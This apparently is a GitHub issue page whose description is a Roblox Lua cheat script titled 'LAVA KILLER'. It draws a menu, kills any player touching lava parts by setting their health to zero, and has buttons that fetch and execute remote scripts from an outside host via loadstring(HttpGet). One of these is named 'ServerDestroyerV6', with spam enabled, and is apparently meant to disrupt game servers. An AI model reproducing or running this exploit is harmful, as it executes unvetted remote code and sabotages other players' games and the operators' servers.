-
Notifications
You must be signed in to change notification settings - Fork 48
Description
-- LAVA KILLER 🔪 COM MENU APRIMORADO
local player = game.Players.LocalPlayer
local gui = Instance.new("ScreenGui")
gui.Name = "LavaKillerMenu"
gui.ResetOnSpawn = false
gui.Parent = player:WaitForChild("PlayerGui")
-- Frame principal
local frame = Instance.new("Frame")
frame.Size = UDim2.new(0, 250, 0, 320)
frame.Position = UDim2.new(0, 20, 0, 50)
frame.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
frame.BorderSizePixel = 2
frame.Parent = gui
-- TÃtulo
local title = Instance.new("TextLabel")
title.Size = UDim2.new(1, 0, 0, 50)
title.BackgroundTransparency = 1
title.Text = "LAVA KILLER 🔪"
title.TextColor3 = Color3.fromRGB(255, 0, 0)
title.TextScaled = true
title.Font = Enum.Font.SourceSansBold
title.Parent = frame
-- Mensagens de status
local statusLabel = Instance.new("TextLabel")
statusLabel.Size = UDim2.new(1, -10, 0, 30)
statusLabel.Position = UDim2.new(0, 5, 0, 260)
statusLabel.BackgroundTransparency = 1
statusLabel.TextColor3 = Color3.new(1,1,1)
statusLabel.TextScaled = true
statusLabel.Text = "Status: Pronto"
statusLabel.Parent = frame
-- Frame de conteúdo para permitir minimizar
local contentFrame = Instance.new("Frame")
contentFrame.Size = UDim2.new(1, 0, 1, -50)
contentFrame.Position = UDim2.new(0, 0, 0, 50)
contentFrame.BackgroundTransparency = 1
contentFrame.Parent = frame
-- Botão de minimizar / expandir
local toggleButton = Instance.new("TextButton")
toggleButton.Size = UDim2.new(0, 40, 0, 40)
toggleButton.Position = UDim2.new(1, -45, 0, 5)
toggleButton.BackgroundColor3 = Color3.fromRGB(80, 80, 80)
toggleButton.TextColor3 = Color3.new(1, 1, 1)
toggleButton.Text = "_"
toggleButton.Font = Enum.Font.SourceSansBold
toggleButton.TextScaled = true
toggleButton.Parent = frame
-- Estado do menu
local isMenuOpen = true
toggleButton.MouseButton1Click:Connect(function()
isMenuOpen = not isMenuOpen
contentFrame.Visible = isMenuOpen
frame.Size = isMenuOpen and UDim2.new(0, 250, 0, 320) or UDim2.new(0, 50, 0, 50)
toggleButton.Text = isMenuOpen and "_" or ">"
end)
-- Função para criar botões
local function createButton(text, y, callback)
local button = Instance.new("TextButton")
button.Size = UDim2.new(0, 200, 0, 40)
button.Position = UDim2.new(0, 25, 0, y)
button.BackgroundColor3 = Color3.fromRGB(80, 0, 0)
button.TextColor3 = Color3.new(1, 1, 1)
button.Text = text
button.TextScaled = true
button.Font = Enum.Font.SourceSansBold
button.Parent = contentFrame
button.MouseButton1Click:Connect(callback)
-- Hover effect
button.MouseEnter:Connect(function()
button.BackgroundColor3 = Color3.fromRGB(120, 0, 0)
end)
button.MouseLeave:Connect(function()
button.BackgroundColor3 = Color3.fromRGB(80, 0, 0)
end)
return button
end
-- Variáveis de controle
local lavaKillEnabled = true
local externalScript1Enabled = false
local externalScript2Enabled = false
-- Botões do menu
createButton("Toggle Lava Kill", 20, function()
lavaKillEnabled = not lavaKillEnabled
statusLabel.Text = "Lava Kill: " .. (lavaKillEnabled and "Ativado" or "Desativado")
end)
createButton("Load LagSeM Aura", 80, function()
if not externalScript1Enabled then
externalScript1Enabled = true
pcall(function()
loadstring(game:HttpGet("https://tcscripts.discloud.app/scripts/lagsemaura"))()
end)
statusLabel.Text = "LagSeM Aura carregado!"
end
end)
createButton("Load ServerDestroyerV6", 140, function()
if not externalScript2Enabled then
externalScript2Enabled = true
getgenv().ServerDestroyerV6 = {Comprar = false, Spam = true}
pcall(function()
loadstring(game:HttpGet("https://tcscripts.discloud.app/scripts/serverdestroyerv6"))()
end)
statusLabel.Text = "ServerDestroyerV6 carregado!"
end
end)
-- Lava Kill funcional
local function onTouch(hit)
if lavaKillEnabled then
local humanoid = hit.Parent:FindFirstChildWhichIsA("Humanoid")
if humanoid then
humanoid.Health = 0
end
end
end
for _, lavaPart in pairs(workspace:GetDescendants()) do
if lavaPart:IsA("BasePart") and lavaPart.Name:lower():find("lava") then
lavaPart.Touched:Connect(onTouch)
end
end
statusLabel.Text = "Menu pronto!"